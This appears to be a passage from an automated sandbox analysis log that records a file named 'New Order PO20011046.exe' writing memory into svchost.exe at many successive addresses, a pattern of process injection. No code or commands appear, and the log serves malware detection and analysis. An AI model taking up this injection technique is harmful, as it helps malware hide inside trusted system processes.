                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: ED0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1000000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1010000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1020000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1030000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1040000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1050000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1060000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1070000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1080000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1090000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1100000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1120000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1160000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1200000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1210000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1220000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1230000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1240000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1250000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1260000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1270000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1280000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1290000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3310000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3320000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3330000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3340000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3350000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3360000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3370000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3380000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3400000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3410000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3420000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3430000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3440000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3450000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3460000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3470000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3490000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3500000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3510000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3520000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3530000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3540000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3550000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3560000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3570000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3580000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3700000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3710000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3720000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3730000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3740000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3750000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3760000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3770000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3780000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3790000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3840000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5120000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5160000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5230000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5240000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5250000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5260000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5270000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5400000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5410000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5420000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5570000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5580000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5590000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5600000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5610000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5620000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5630000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5640000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5650000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5660000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5670000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5680000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5690000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5700000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5710000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5860000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5870000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5880000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5890000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5900000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5910000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5920000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5930000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5940000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5950000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5960000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5970000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5980000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5990000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A80000
